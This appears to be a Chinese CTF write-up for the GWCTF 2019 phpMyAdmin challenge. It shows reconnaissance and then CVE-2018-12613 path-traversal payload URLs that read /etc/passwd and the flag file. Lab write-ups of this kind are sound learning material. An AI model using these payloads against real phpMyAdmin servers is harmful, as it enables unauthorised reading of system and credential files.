当前位置:   article > 正文

[GWCTF 2019]我有一个数据库(特详解)

[GWCTF 2019]我有一个数据库(特详解)

页面一开始乱码,先教大家应该修复的方法,到火狐打开,然后找到小工具里的修复文字编码,就可以了(没有的话可以在定制工具栏里添加)

image-20240131174304889

一般页面读取乱码都可以这样解决

image-20240131174515957

他说什么都没有,先dirsearch扫一下

image-20240131174605840

先看看robots.txt里又啥

image-20240131174717565

查看phpinfo.php看看

image-20240131175206943

查看其他的吧,有个数据库看看去

image-20240131175139209

在界面可以查到各服务器的版本,可以去百度各版本服务器的漏洞

image-20240131181617698

这里就不一样查了,直接上结论

查询到4.8.1版本存在任意文件读取漏洞:phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)

直接看上面那个师傅的文章,十分详细的

接下来就是利用文章里的payload了,这里../回到上一级目录,只要多于5个,能回到根目录就行,etc/passwd是linux存放用户和密码的文件,在根目录

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

image-20240131182341538

接下来就是flag了

/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../flag

image-20240131182441692

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/代码艺术家/article/detail/61046
推荐阅读
相关标签
  

闽ICP备14008679号